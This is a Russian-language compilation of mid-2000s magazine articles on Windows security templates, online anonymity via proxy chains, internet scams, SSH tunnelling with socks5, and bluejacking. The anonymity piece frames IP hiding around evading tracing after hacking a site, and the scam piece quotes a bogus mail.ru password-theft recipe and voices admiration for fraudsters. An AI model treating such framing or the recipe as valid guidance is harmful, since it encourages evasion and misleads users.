Столбцы на правой створке окна раскрывают, в чем заключается отличие настроек безопасности системы от параметров загруженного вами шаблона. Разделы «Политики учетных записей» и «Локальные политики» содержат по три столбца, которые расскажут вам про конкретный тип настройки («Политика»), про настройки, зафиксированные в шаблоне («Параметр базы данных»), и про конфигурацию вашей системы («Параметры компьютера»).
Изменяем параметры системы
Если все или почти все параметры помечены зеленой «галкой», то безопасность вашей системы практически соответствует рекомендациям базы данных выбранного шаблона. Можно расслабиться и попить кофейку. Но как быть тогда, когда есть много расхождений, помеченных красными косыми крестами? Здесь возможно несколько вариантов действий.
Не делать ничего. Если работа системы вас устраивает и нет резона считать, что в ее безопасности наличествуют какие-то бреши, просто махните на результаты анализа рукой. Зачем чинить то, что не сломалось? Это самый простой подход, и я рекомендую вам именно его — если, конечно, ничто не дает вам оснований думать, что у вашей системы действительно имеется какая-то проблема с безопасностью.
Применить другой шаблон. Обилие расхождений может указывать на то, что выбранный шаблон просто не подходит к вашей системе. Чтобы подыскать что-нибудь получше в Windows XP, выберите опции «Пуск-Справка и поддержка». В окно поиска введите последовательность «Готовые шаблоны безопасности» и нажмите . Затем щелкните на позиции «Готовые шаблоны безопасности» на левой створке, дабы прочитать основные сведения о них на правой. В Windows 2000 щелкните на кнопке с вопросительным знаком «Справка» в правой части панели инструментов утилиты настройки безопасности. Щелкнув далее на закладке «Содержание», выберите опции «Анализ и настройка безопасности-Дополнительно-Готовые шаблоны». Нужная вам информация появится на правой створке окна.
Если вы найдете более подходящий шаблон, выделите на левой створке значок «Анализ и настройка безопасности», а потом задайте опции «Действие-Импорт шаблона» (или щелкните на этом значке правой кнопкой мыши и выберите «Импорт шаблона» из контекстного меню). В диалоговом окне импорта шаблона включите функцию «Очистить эту базу данных перед импортом», чтобы заменить текущий шаблон (в противном случае в результате опытов вы получите смесь настроек из различных шаблонов). Выделите нужный шаблон, нажмите кнопку «Открыть» и повторите анализ описанным выше способом.
Настройте отдельные параметры. Если вам свойственно дуть на воду и вы просто не можете все это так оставить, исследуйте те настройки компьютера, которые отличаются от параметров базы данных шаблона. Причем про каждый из параметров решите, стоит ли его изменять, и если стоит, то как именно. Самый безопасный способ сделать это — использовать для анализа другой инструмент, а не тот, что был применен для создания шаблона. Например, если параметры, которые вы хотите изменять, относятся к разделам «Политики учетных записей» или «Локальные политики» нового инструмента, то выберите опции «Пуск(Все) программы-Администрирование-Локальная политика безопасности» или щелкните на кнопке «Пуск», затем на «Выполнить» и введите команду secpol.msc /s, после чего нажмите .
При использовании инструмента «Локальная политика безопасности» («Локальные параметры безопасности» в Windows 2000) к системе применяются только измененные параметры, а вот в случае инструмента «Анализ и настройка безопасности» вы рискуете получить для своей системы десятки всевозможных неизвестных шаблонов. Поэтому имеет смысл ограничить использование последней утилиты, определив то, какие элементы следует настраивать с помощью инструмента «Локальная политика безопасности».
В системе Windows XP каждый значок описывается в разделах «Политики учетных записей» и «Локальные политики» инструментов «Локальная политика безопасности» и «Анализ и настройка безопасности». Чтобы получить доступ к этим описаниям, укажите «Пуск-Справка и поддержка», введите в окно поиска последовательность «Политики учетных записей и локальные политики» и нажмите . В окне результатов поиска выберите список, полученный после полнотекстового поиска, и щелкните на позиции «Политики учетных записей и локальные политики». Потом используйте текст и ссылки на правой створке окна для поиска нужной вам информации. Windows 2000 таких сведений не предоставляет, но можно щелкнуть на кнопке «Справка» в правой части панели инструментов, выбрать «Содержание-Анализ и настройка безопасности-Дополнительно» и получить там некоторые рекомендации.
Рискните всем. Если настройка всякого рода дополнительных параметров — для вас дело привычное, то используйте инструмент «Анализ и настройка безопасности» для применения всех или некоторых параметров какого-либо шаблона. Чтобы внести в текущую конфигурацию машины только отдельные изменения, дважды щелкните в правой створке окна на значке того параметра, который вы считаете необходимым изменить, например на помеченном косым крестом в красном кружочке. Затем включите или выключите функции в нужных позициях столбца параметров базы данных (точнее, в соответствующих диалоговых окнах, когда они раскроются) или подстройте другие параметры в диалоговом окне.
Завершив внесение изменений, щелкните на OK и укажите опции «Консо-Сохранить». Чтобы применить изменения к вашей системе, выделите значок «Анализ и настройка безопасности» на левой створке окна и выберите «Действие-Настроить компьютер». Затем введите путь файла журнала ошибок или щелкните на OK, чтобы принять путь, указанный по умолчанию. Когда применение новых параметров будет завершено, то повторите анализ. Вы должны будете увидеть меньшее число крестиков в красных кружочках, поскольку параметры системы теперь будут соответствовать параметрам текущей базы данных.
Проверьте подключения к локальной сети и к Интернету, а также электронную почту и другие приложения, которые могли затронуть внесенные изменения, а если возникнут проблемы, то восстановите Реестр.
Scott Dunn. Create Your Own Windows Security Analysis Tool. PC World, март 2005 г., с. 142.
Инструмент для настройки и обеспечения безопасности Windows
Новая версия Fresh UI, удобного первоклассного инструмента для конфигурирования Windows, отличается расширенными возможностями для настройки каждой мелочи в системе по вашему усмотрению. Кроме того, эта программа охраняет от вторжений в вашу личную сферу и делает ОС более безопасной. Доступ к десяткам различных опций осуществляется с помощью привычного дерева на левой створке окна, тогда как столбец в правой створке сообщает, какие версии Windows поддерживают выделенный вами параметр. На справочной створке отображаются краткие сведения о выделенных группах настроек. И при всем при этом Fresh UI — совершенно бесплатный продукт; правда, для получения регистрационного кода, нужного для установки, вам придется сообщить компании-производителю свой адрес электронной почты. Переписать программу можно по адресу find.pcworld.com/45634.

Экзамен по безопасности: оценки в ведомости
Для сравнения параметров безопасности Windows с шаблонами утилиты «Анализ и настройка безопасности» надо уметь интерпретировать значки тех политик, которые эта программа использует.

Остаться анонимным в Сети
Автор: HvosT
Когда только появился и начинал делать первые шаги Интернет, каждый пользователь ощущал безграничную свободу, независимость и, как говорил герой небезызвестного фильма «Хакеры», «чувствовал себя почти богом».
В сталинские времена были очень популярны «анонимки». Вы могли «сдать» кого угодно, а сами остаться ни при чем. В Интернете вы можете использовать ник-нейм, совращать малолетних в чате, предсказывать приближение апокалипсиса или сообщать о заминированных зданиях на форумах, казалось бы, анонимно. Но дяди с дипломатами сразу «просекли фишку» и увидели в Сети подобного типа угрозу. И пошло-поехало. В данной статье я попробую разобраться: как же все-таки остаться незамеченным.
Кто стучится в дверь ко мне?
Сначала разберемся, как нас могут отследить. Как вы знаете, каждому пользователю Интернета присваивается свой уникальный IP-адрес. Предположим, вы взломали сайт. Что делает его администратор? Смотрит в логи (файлы, куда записываются все данные о подключениях и не только) сервера, кто посещал и изменял информацию во время взлома. Затем, узнав его IP-адрес, служитель интернет-порядка звонит провайдеру, предоставляющему услуги данному IP. Тот смотрит в свои логи и сообщает телефон, с которого совершался дозвон. Спецслужбы проверяют его по телефонному справочнику:), и все: ОМОН звонит в дверь или ее выбивает. Естественно, это очень банальный случай, но пока нам больше не надо. Итак, следовательно, нам нужно серфить так, чтобы IP серверу не передавался. Точнее сказать, чтобы передавался не наш IP. Если вы и вправду решили взломать сайт президента, то лучше воспользоваться подменой IP — IP-Spoofing’ом (здесь вам посоветовать что-либо не могу), а еще лучше — веревкой и мылом.
Сначала следует разбить один стереотип. Еще остались первобытные племена интернетчиков, которые свято верят, что отследить человека в Интернете невозможно. Что ж, вы наверняка видели на сайтах небольшие таблицы вроде «География посещений», где приводятся рейтинги стран, откуда люди посещают сервер. Веб-мастера, если следят за своей статистикой, также могут видеть информацию о посетителях: районе (области), городе, времени и т. д. Вся эта информация составляется на основе IP-адресов посетителей. В связи с этим я задал вопрос менеджеру компании DreamHoster.net: «Какая конкретно информация о пользователях сохраняется в логах на ваших серверах?» На что он ответил: «У нас на серверах ведутся логи для всех сервисов: apache-сервера, баз данных (SQL), Exim, Imap (входящая и исходящая почта), доступ к FTP-серверам, DNS и т. д. Конкретно у нас на сервере сохраняется IP-адрес, время, дата, какая информация была загружена/скачана, какая изменена. Такие логи ведутся постоянно, то есть бесконечно, пока не закончится место на диске:). Сейчас таких записей около 5-10 гигабайт. Однако в панели управления сайтом каждый веб-мастер имеет доступ к более обширной информации: откуда пользователь перешел на сайт, тип браузера, поддержка Java, операционная система, количество переданной информации, ее тип, провайдер, запрос в поисковой машине, по которой перешел пользователь, и т. д.»
Итак, начнем с самого распространенного и широко известного способа стать анонимным. Это прокси-серверы (proxy-servers). Прокси-сервер — это посредник, выступающий между вами и web-сервером, информацию с которого вы хотите получить. Многие прокси-серверы настроены таким образом, что при обращении к запрошенному web-серверу он выдает реальный IP пользователя. Остальные прокси называются анонимными. В Сети часто пишут, что существуют «прозрачные» прокси, которые выдают реальный IP пользователя в заголовке HTTP-запроса, а не в заголовках TCP/IP-пакета. На самом же деле никакие прокси не передают такого рода информацию в заголовках TCP или IP. Если же вы намереваетесь часто использовать proxy, то советую воспользоваться специализированными программами, которые будут отслеживать «мертвые», а также создавать списки адресов прокси, проверять их на анонимность, скорость и т. д. Также существуют сокс-серверы (socks-servers) схожие по функциям с прокси.
Главное отличие их в том, что последние занимаются анонимизацией через HTTP-протокол, а socks умеет обмениваться информацией в сети также и через FTP, IMAP, POP3, SMTP и многие другие, что означает возможность анонимного e-mail’a, но об этом чуть позже. Найти адреса socks-серверов можно по тем же ссылкам, что и proxy — отдельно есть, к примеру, здесь: сайт. Сама технология Socks была разработана в 1990 году Дейвом Кобласом, работающим в компаниеи SGI. Последняя на сегодняшний день, 5-я, версия протокола была разработана почти 10 лет назад — в далеком 1996. Вот что пишет о socks.hostinfo (сайт): «Дело в том, что socks-клиенты располагаются между прикладным и транспортным уровнями согласно сетевой модели OSI. То есть фактически они ничего не знают о протоколах высокого уровня (HTTP, POP3, FTP и т. д.). Таким образом, socks-клиентам нет никакой разницы, какую информацию передавать на сервер».
Главное преимущество Socks не только в разнообразии протоколов, но и в теме нашего разговора — анонимности. Все тот же. hostinfo пишет, что socks гарантирует вам анонимность, т. к. «передача IP- адреса удаленного компьютера в принципе не предусмотрена этой технологией. Более того, socks-сервер, в отличие от прокси-сервера, не занимается преобразованием заголовков HTTP-пакетов, он создает их сам от себя». И ошибается. Все наоборот: именно традиционный HTTP-proxy создает соединения и заголовки HTTP, в том числе заново, то есть «от себя». Как видите, даже авторитетные источники частенько дают не самую достоверную информацию о проблемах proxy/socks серверах.
Бабка за дедку, дедка за репку…

Но не все так просто: proxy и socks-серверы сохраняют логи о том, с какого IP вы к ним подключались. Здесь приходит на ум почти гениальная идея: а что, если я подключусь к proxy через другой proxy? Здесь я могу посоветовать программу FreeCap: сайт. Устанавливаем, заходим в Файл — > Настройки — > Цепочка прокси и кнопкой Добавить создаем цепочку. Указываем адрес, порт, тип протокола (SOCKS 4, SOCKS 5, HTTP-прокси), если требуется авторизация, выбираем одноименный пункт.
Кстати, есть и платные прокси или сокс-серверы. В основном для них и требуется авторизация. Из цепочки можно исключать некоторые серверы, не удаляя их. Для этого просто снимаем галочку в соответствующем месте. Еще одна немаловажная деталь и полезная функция программы — возможность использования прокси/сокс в программах, не поддерживающих эту функцию — например, The Bat! Выберите в главном меню или в меню Файл — Новое приложение и укажите exe-файл программы. FreeCap умеет проверять proxy/socks на анонимность и работоспособность.
Незаметен, как мышь

В Сети есть такой замечательный ресурс, как Anonymouse (сайт), позволяющий анонимно заходить на любой web-ресурс. При этом ему будет передаваться не ваш IP, а IP Anonymouse. Однако проект Андреаса Биллиона и Александра Пирхера также не может обещать 100 % защиты, т. к. на сайте в течение 20 дней хранятся логи посещений. «Для самозащиты, чтобы иметь информацию о тех, кто грубо нарушает наши условия», — говорит Андреас Биллион, — впоследствии эти файлы необратимо удаляются», — пишет MacUP. Но, тем не менее, со своей работой сервис справляется отлично. На скриншоте вы можете увидеть, как сайт определил пользователя, вошедшего через Anonymouse.
Кроме этого сервиса, есть и другие анонимайзеры — например, сайт (правда, на нем существуют некоторые ограничения), сайт, сайт, сайт. Многие из них позволяют запретить cookies, убрать рекламу, скрипты, формы.
Сам себе анонимайзер
Но вы можете создать и свой анонимайзер совершенно бесплатно. На странице сайт есть бесплатный open-source- движок CGIProxy 2.0.1. Последняя стабильная версия программы находится здесь:
сайт, его код — здесь: сайт proxy.cgi.txt. Последняя бета-версия CGIProxy 2.1beta10 лежит здесь: сайт. На сайт вы также можете анонимно отправить e-mail. Казалось бы, дела с почтой должны быть проще, т. к. в Сети огромное количество скриптов анонимной отправки e-mail, да и написать его самому при знании PHP особых трудностей не составит. Однако, если своего сайта нет, и возможности самому создать скрипт тоже нет, придется поискать работающий сервис, т. к. большинство отправленных сообщений отфильтровываются почтовыми службами как спам. До меня, к примеру, дошло сообщение вот отсюда: сайт.
Для рядового пользователя рассмотренных способов остаться анонимным вполне хватит. Если же вы решили тотально зашифроваться, то лучше всего сесть в бункере, выйти в Сеть через Wi-Fi или GPRS по купленной SIM-карте (правда, не уверен, что телефон там будет ловить сигнал), заюзать цепочку прокси разного вида и стран, не забывая комбинировать их с socks, через все это хозяйство зайти на Anonymouse через Anonymizer и т. д. Затем купить темные очки и кепку.
Адреса прокси- и сокс-серверов
сайт, сайт, сайт, сайт, сайт, сайт, сайт, сайт.
Настройка proxy/socks в популярных приложениях
Internet Explorer 4.X—Вид (View)—>Свойства обозревателя (Internet Options)—>Соединение (Connections)—>Подключаться к Интернету через прокси-сервер (use a proxy server)—>введите адрес сервера и порт.
Internet Explorer 5.X/6.X—Сервис (Service)—>Свойства обозревателя (Internet Options)—>Соединение (Connections)—>выберите необходимое соединение Настройка (Settings)—>введите адрес сервера и порт.
Opera 5.X—6.X—Файл (File)—>Настройки… (Preferences…)—>Category—>Подключения (Network)—>Прокси-серверы… (Proxy servers…), нажмите на галочки возле необходимых протоколов, введите адрес сервера и порт.
Opera 7.X—так же, как и в Opera 5.X—6.X, однако вместо Файл (File) выбрать Tools (Интрументы).
Mozilla Firefox—Tools—>Options—>General—>Connection Settings—>Manual Proxy Configuration—>введите адрес сервера и порт.

Как определил меня web-сайт в разных случаях — сверху вниз: используя сайт; используя сайт; без каких-либо анонимайзеров; через прокси.

Схема того, как производится запрос и работа пользователя через proxy/socks.
Лохотроны в Сети — мошенничество в интернете
Автор: HvosT
Есть масса способов заработка денег. Наибольшее количество из них — нелегальные. Особой категорией нелегальных способов является лохотрон, который также подразделяется на составные. У лохотрона в Интернете также есть масса схем и постоянно развивающихся технологий.
И было начало
Как только появился Интернет, мошенники увидели в нем новое перспективное и безграничное пространство для лохотрона. Мало того, что за «бесплатный Интернет», «генератор паролей» и т. п. пользователь платил деньги, так еще и получал чаще всего трояна или вирус. Пользователи становились все менее доверчивыми, лохотронщики придумывали все более изощренные способы доставания денег из кармана граждан, заглядывающих в Сеть. Сегодня мошенники в зависимости от масштабов продвигаются по-разному: кто-то просто кросспостит на форумах, кто-то создает огромные проекты, веб-сайты.
Обманщики обманывают обманщиков
На крупных форумах можно часто увидеть такое сообщение — явный пример мелких махинаций:
«Хочу рассказать вам, как меня обманули на 150 WMZ.
Нашел я в сети где-то статью приблизительно такого содержания: «Есть в системе WebMoney волшебный WMZ кошелек, и все что вы на него пошлете, вернется вам в утроенном размере! Любая сумма! Пошлете тысячу — получите три тысячи и т. д.».
Я не поверил, но для теста послал 1 доллар. Через 5 часов проверил свой WMZ кошелек и обнаружил перевод в три доллара! Я удивился. Послал потом еще доллар, опять то же самое. Потом послал 5 долларов, мне пришло 15. Осмелев окончательно, послал все, что у меня было — около 150 WMZ… Что было дальше, думаю, вы уже поняли. Никаких 450 WMZ мне никто не прислал, да и мои 150 тоже исчезли навсегда…
Есть несколько десятков таких кошельков. Вот три самых крупных:…».
Разузнать в нем лохотрон очень трудно, т. к. этот способ — двойной обман. Перечисленные кошельки принадлежат человеку, пишущему данное сообщение. Доверчивый человек думает: «мне чужого не надо, пошлю всего 1 или 5 долларов — получу в три раза больше — и то хорошо».
В 2004 году различные порталы, промышляющие краденым или взломанным софтом (то есть так называемые варез-порталы), и мелкие проекты гонялись не за деньгами, а за паролями для того, чтобы рассылать спам:
«Взломать, т. е. получить пароль любого ящика на mail.ru и tut.by оказывается проще простого. Дело в том, что mail.ru видимо писал какой-то корявый програмер и оставил одну существенную ошибку в своей «работе», докопаться до которой было довольно таки сложно, но… все приходит — нужно только время. Tut.by поддается нижеописанному способу кражи пароля с ящиков по той причине, что там сидят еще более кривые програмеры и вместо того, чтобы самим написать свою технологию работы почты они ее просто приобрели у mail.ru.
Теперь суть ошибки:
На mail.ru (и на tut.by тоже) есть система восстановления пароля: именно при ее разработке разработчики допустили серьезную ошибку: Когда заполняешь форму на странице восстановления пароля и нажимаешь «Отправить», с помощью sendmail’a отправляется письмо к «mail-роботу», который при правильном сочетании «Вопрос — Ответ» отправляет пользователю пароль. Как выяснилось — этот «робот» изначально писался для многофункциональной работы: например можно ему выслать пароль и имя ящика — и тогда он выдаст ответ на «секретный вопрос», или отослать ответ на «секретный вопрос» и логин — тогда вам будет прислан пароль и т. д. Но это еще полбеды. Оказывается если прислать «роботу» имя ящика (логин), пароль на него и ответ на «секретный вопрос», а как неизвестное вписать какое-либо имя ящика (логин), находящегося на этом сервере, то робот пришлет нам пароль на этот ящик!
Теперь что и куда надо слать:
Mail-программа, принимающая запросы пользователей о забытых паролях установлена на mail.pass@mail.ru (у tut.by это — mail-pass@tut.by). В теле письма начиная с 1-ой строчки нужно писать:
$default-box: «имя_вашего_ящика_полностью»;
$default-pass: «пароль_вашего_ящика»;
$default-answ: «ответ_на_секретный_вопрос»;
?a_reppair=
$unknown-box: «имя_ящика_пароль_которого_хотите_узнать»;
$unknown-pass: «#take
#unknown-pass>»;
$CI: mail-box: «сюда_еще_раз_имя_ящика_жертвы»;
?>»
«Корявый программер» — скорее тот, кто это придумал, т. к. такого кода в принципе быть не может. Суть этой аферы заключается в том, что незадачливые «хакеры», поверившие в написанное, сами присылают на указанные e-mail’ы свои пароли. А электронные адреса (в данном случае mail.pass@mail.ru и mail-pass@tut.by) принадлежат злоумышленникам, которые впоследствии будут использовать ваш ящик, к примеру, для рассылки спама.
На Нигерию дедушке
Распространенным лохотроном являются и так называемые «нигерийские письма», или «афера 419». Особый расцвет этой аферы пришелся на 2000–2003 гг. Вот что пишет о нем А. Тарасов — автор книги «Миллионер»: «Классическая нигерийская схема такова. Сначала мошенники проводят рутинную работу по поиску клиента. Вы не получали писем от нигерийского королевского дома? Возможно, скоро получите. Ведь по почте и по Интернету такие письма рассылаются сотнями тысяч. В них описываются душещипательные истории о том, как члены королевской семьи, обеспокоенные размещением своих капиталов, ищут честных партнеров, чтобы использовать их счета для перевода денег за границу. Разумеется, вашу фирму они выбрали не случайно, а по совету известных международных консультантов, тщательно изучив историю вашего успешного бизнеса. Все, что от вас требуется, — указать реквизиты вашего банковского счета, получить несколько миллионов долларов и честно оставить себе десять-двадцать процентов за оказанную помощь…» Подробнее на примере с полной перепиской и фотографиями об этой афере смотрите здесь: сайт.
Покупки даром
Недавно по российским почтовым серверам прокатилась волна спама с рекламой сайтов сайт и сайт. Эти интернет- магазины продают карженый (от слова кардинг — взлом и завладение кредитными карточками и паролями к ним) товар:
«Здесь Вы можете приобрести товар за 20–30 % от его реальной стоимости. Вы спросите, откуда у нас ТАКИЕ ХОРОШИЕ ЦЕНЫ? Все ОЧЕНЬ ПРОСТО — мы занимаемся кардингом, т. е. покупаем товар в западных Internet-магазинах по ворованным кредиткам и доставляем его в РФ».
Но на самом деле это еще один вид жульничества. Никакого товара вы не получаете, а магазины уходят от ответственности, т. к. не являются официальными ЧП или организациями. Так со всем: если в чем-либо вы видите хоть каплю криминала, с этим нужно быть крайне осторожным.
Голь на выдумки хитра
Обычно лохотронщики предлагают то, что хочется всем: все и нахаляву. Недавно был придуман еще один способ:
«Люди, помогите, есть база номеров МТС, но она в архиве и запоролена, помогите кто-нибудь».
Вам присылают архив, в нем находится троян или вирус. Ну, а троян крадет пароли от e-mail’ов или других служб, а потом, как я уже говорил, жулики могут использовать их в разных целях. Тем более как человек мог узнать, что в архиве база, если не может его открыть. Кстати, сразу скажу о базе МТС, чтобы у вас не было никаких сомнений. Существует только одна база, датированная 2003 годом, и только по абонентам Москвы и Московской области. Эта база была украдена работниками ФСБ, когда МТС допустила их к своим данным во время захвата заложников на Дубровке. Других баз в свободной продаже нет: их охраняют как зеницу ока.
Кто же эти лохотронщики?
Лохотронщики — это как правило программисты и предприниматели, в таком деле не помешало бы и знание психологии. Наверняка вы слышали о «деле Лесика». 25-летний Александр Жданов, создавая интернет-пирамиды, предлагал открыть свой счет на одном из сайтов, вложить небольшую сумму денег (около $10). За месяц вы должны были получить 100–400 % подъем. Казалось бы — ерунда какая, но Лесик обманул около 11000 человек из разных частей света и заработал $3.983.229.67 (почти четыре миллиона долларов). Этот случай показывает масштабы лохотрона, которые пока что безграничны.
Естественно, бороться с мошенниками должны правоохранительные органы. Уже упомянутый Лесик признан виновным в «несанкционированном доступе к компьютерной информации», «модификации компьютерной информации», «подстрекательстве к компьютерному саботажу», «неправомерном завладении компьютерной информацией» и «хищении путем использования компьютерной техники» и получил 9 лет колонии усиленного режима, а его имущество подлежит конфискации.
В рамках конференции на портале TUT.by Михаил Старикович, заместитель начальника управления по раскрытию преступлений в сфере высоких технологий МВД Беларуси, или так называемого управления «К», на мой вопрос о том, что делают с лохотронщиками, ответил, что, «если они при этом совершают хищения путем использования компьютерной техники, то в их действиях содержатся признаки преступления, предусмотренного ст. 212 Уголовного кодекса». Данная статья предусматривает хищение имущества путем изменения информации, обрабатываемой в компьютерной системе, хранящейся на машинных носителях или передаваемой по сетям передачи данных либо путем введения в компьютерную систему ложной информации. Согласно Уголовному кодексу РБ самое суровое наказание, которое вы можете понести (при условии, что преступление совершено организованной группой либо в особо крупном размере) — это лишением свободы на срок от шести до пятнадцати лет с конфискацией имущества и лишением права занимать определенные должности или заниматься определенной деятельностью или без лишения. За 10 месяцев 2005 года по статье 212 УК РБ было возбуждено 23 уголовных дела.
Интернет не имеет границ, с помощью электронных денег вы можете без проблем и анонимно переводить любые суммы. Ведь если лохотронщик находится за пределами Беларуси и не является гражданином РБ, то уголовную ответственность в соответствии с УК РБ он нести не может. Здесь играет определенную роль и психологический фактор: станете ли вы обращаться в милицию из-за, к примеру, $3? Любой продвинутый пользователь компьютера не станет связываться с милицией по делам, касающимся информации, т. к. наверняка на носителях в его доме есть hack tools, крэки и другие вещи, за которые можно понести ответственность. Следовательно, лохотронщиков могут отловить только правоохранительные органы, проводя оперативные действия под видом обычного пользователя.
Кто следующий?
Любой человек, имеющий опыт работы в Интернете, попадался или хотя бы сталкивался с лохотроном в том или ином виде, ведь чем дольше бороздишь просторы необъятной Сети, тем больше видишь подобных информационных приманок.
Как не попасться?
Лохотронщики — люди, которые знают свое дело, и лично у меня они вызывают восхищение: заставить человека самого положить в твой карман свои деньги и остаться недосягаемым для претензий умеет не каждый. Как не стать жертвой? Думать, прежде всего, головой и зарубить себе на носу, что бесплатный сыр в 99 % случаев бывает сами знаете, где.
SSH-туннелинг, или замена VPN. Организации туннеля по SSH-протоколу
Автор: Terabyte
В последнее время довольно большое распространение получила технология VPN (Virtual Private Networks). В большинстве случаев ее используют люди для шифрования передаваемой информации через локальную сеть (защита от снифанья трафика, что довольно легко осуществить в сети, даже на свичах) и/или последующей передачи информации через Интернет (тут уже целями будет скрытие своего IP-адреса, защита от глобального снифа трафика всей страны (aka СОРМ, он же нынешний СОРМ2) и.д.). Многие уже давно используют данную технологию VPN, но немногие знают об ее более дешевой и мобильной альтернативе — SSH-туннелинге.
Принцип данной реализации следующий. Весь сетевой софт на компе (ну или не весь) форвардится на назначенный порт вашего локалхоста, на котором висит сервис соединенный по SSH с сервером (а как мы знаем, соединение по SSH протоколу шифруется) и туннелирующий все запросы, далее весь ваш трафик (уже не в зашифрованном виде форвардится с нашего сервера на прокси (поддерживающий туннерирование) или сокс, который передают весь трафик к необходимым адресам. Наличие прокси или сокса обязательно, но если нам не нужна полнейшая конспирация, то мы можем организовать данный сервис (proxy/socks) на своем сервере, где у нас находится SSH-аккаунт, но об этом позже.
Теперь давайте разберемся с минимальным набором инструментов и сервисов необходимых для организации данного процесса. В первую очередь нам нужна программа для организации туннеля по SSH-протоколу. Для этой задачи мы можем применить VanDyke Entunnel или Putty (вкладка Connection\SSH\Tunnels). В наших примерах я буду использовать Entunnel. Далее мы можем вручную прописывать в каждой программе работу через прокси или использовать специализированную программу для перенаправления запросов, такую как ProxyCap, SocksCap, FreeCap и т. п. В нашем примере будет использоваться ProxyCap, как наиболее удобная софтина (кстати, через ProxyCap мы сможем сделать туннерирование даже WebMoney, которая известна защитой от такого вида софта, для скрытия IP). Также нам понадобится SSH-аккаунт (на сервере желательно расположенном за пределами вашей страны =), который можно без проблем достать (например, я покупаю VPS-хостинг для этого) и socks’ы.
Первым делом создаем SSH-аккаунт. Далее я предлагаю вам использовать socks-сервер, а не proxy, т. к. не все прокси поддерживают туннелирование. Также может оказаться, что сегодня прокси анонимный, а завтра уже и не нет (если конечно не вы сами отвечаете за него). Как я уж говорил, мы можем использовать сокс на удаленной машине (для большей безопасности) и на своей (где SSH-аккаунт). Для примера я покажу, как установить сокс-демон. Наиболее популярные и продвинутые демоны под никсы это socks5 от Permeo/NEC, Dante и отечественный продукт 3proxy. Для примера я выбрал классический демон на FreeBSD — socks5.
Для тестирования использовалась FreeBSD 5-ой ветки. Я устанавливал socks5 из портов (/usr/ports/net/socks5/), но и из сорцов под фряхой тоже все хорошо собирается и ставится:
cd /usr/ports/net/socks5/makemake installrehash
Для нормальной работы демона необходим кофиг к демону socks5.conf и файл паролей socks5.passwd (если необходима аутификация к сокс-серверу по паролю):
touch /usr/local/etc/socks5.conftouch /usr/local/etc/socks5.passwd
Далее добавляем в конфиг следующие строчки:
auth —
upermit u —
SET SOCKS5_BINDINTFC 1.2.3.4:8080
SET SOCKS5_CONFFILE /usr/local/etc/socks5.conf
SET SOCKS5_PWDFILE /usr/local/etc/socks5.passwd
SET SOCKS5_MAXCHILD 128
SET SOCKS5_NOIDENTSET SOCKS5_NOREVERSEMAP
SET SOCKS5_NOSERVICENAME
SET SOCKS5_V4SUPPORT
SET SOCKS5_ENCRYPT
SET SOCKS5_FORCE_ENCRYPT
SET SOCKS5_UDPPORTRANGE 1023-5000
Первые две строчки указываю, что необходима аутификация по логин/пароль. SOCKS5_BINDINTFC указывает на какой IP (если у сервера несколько алиасов) и порт повесить демон. SOCKS5_MAXCHILD по умолчанию 64, я советую увеличить до 128, что бы всем юзерам (если их много) хватило потоков. Далее идут строчки для ускорения работы демона. SOCKS5_V4SUPPORT — поддержка 4-ой версии протокола. SOCKS5_ENCRYPT и SOCKS5_FORCE_ENCRYPT поддержка шифрования, если клиент это поддерживает. За более подробной информацией по установка обращайтесь к файлам README и INSTALL, а за информацией по настройке к манам socks5(1) и socks5.conf(5).
Далее заполняем файл паролей. Он имеет обычный текстовый формат и login/password разделяются в нем пробелами:
Теперь можно запускать демон и приступить к настройке клиентского софта:
Запускаем ProxyCap, кликаем правой кнопкой мыши на значке в трее, Preferences. На вкладке «Proxies» вписываем 127.0.0.1:8080 и устанавливаем в «Require Authorization» наш login/password на сокс. На вкладке «Rules» добавляем сначала правило для Entunnel, указав в «Rule Type» — Force direct connetion. Далее создаем правило, для всего остального софта, трафик от которого будет шифроваться и туннелироваться через сокс. В правиле указываем «All Programs», «Tunnel through proxy» и в выпадающем меню наш сокс. Также можно создать правило не для всего софта, а только выборочный софт пускать через туннель или наоборот, создать правило для всего софта, но для некоторого софта сделать прямой доступ в инет (Force direct connetion).
Запускаем Entunnel и создаем в нем новое соединение по SSH. Далее в свойствах соединения (Port Forwarding) добавляем наш сокс. В категории «Local» вписываем 127.0.0.1:8080, а в категории «Remote» вписываем IP и порт нашего сокс-сервера. Настройка закончена! Если что-то не работает, то еще раз перечитайте все пункты настройки.
Какие плюсы данной системы:
Для организации данной схемы не нужно устанавливать серверный софт (т. к. SSH-аккаунт и сокс можно без проблем достать в инете); Т. к. при SSH-соединении трафик шифруется и сжимается, то мы получаем небольшой прирост скорости работы в инете (это верно, когда сокс-демон находится на том же сервере); В случае, когда сокс-сервер находится на другом хосте, то мы получаем дополнительную цепочку серверов, которые повышают нам безопасность и анонимность.
Зубы режутся!
Автор: Роман Воробьев
С активным внедрением стандарта беспроводной связи Bluetooth у технически продвинутых пользователей появились и новые развлечения. Что же предлагает нам «голубой зуб»? Прежде всего, обмениваться информацией «по воздуху» и синхронизировать данные между различными устройствами, а также использовать беспроводные гарнитуры. Но это все давно известно. А вот слегка пошалить, используя устройства, оснащенные «голубым зубом», догадались немногие, хотя, думаю, после публикации этой статьи их число возрастет.
Так что же придумали неугомонные пользователи Hi-Tech-штучек? Представьте себе, новый вид общения! Он получил название «блюджекинг» (от англ. вluejacking), а люди, использующие его, именуются «блюджекеры». Выглядит это приблизительно так: блюджекер с помощью мобильного телефона, КПК или какого-либо другого устройства, оснащенного «голубым зубом», сканирует местность на предмет наличия устройств с включенным Bluetooth. Как правило, в качестве полигона выступают места с наибольшим скоплением мобильной молодежи (кафе, кинотеатры, бары). После обнаружения устройства с открытым «голубым зубом» блюджекер отправляет какое-нибудь забавное сообщение на это устройство и пытается определить, кто его получил (ведь не зная владельца, трудно его идентифицировать сразу же). После выявления получателя блюджекер наблюдает за его реакцией и действует согласно обстановке. Ну и какой тут интерес, спросите вы? А разве не забавно, например, следить за симпатичной девушкой, получающей на мобильный телефон комплименты и не понимающей, кто и откуда ей их присылает; или отослать «атакуемой» жертве ее фотографию и смотреть, как она станет метаться в поисках «папарацци». Блюджекинг чем-то сродни рыбалке: как рыбак, вы пытаетесь подцепить на крючок «синезубые» устройства, обитающие в огромном людском водовороте вокруг вас. Так, «блюджекая» окружающих, можно завязать много новых и интересных знакомств и даже пофлиртовать. В общем, у кого на что фантазии хватит, главное — не перегнуть палку и вовремя остановиться (или раскрыться).
Выбираем оружие
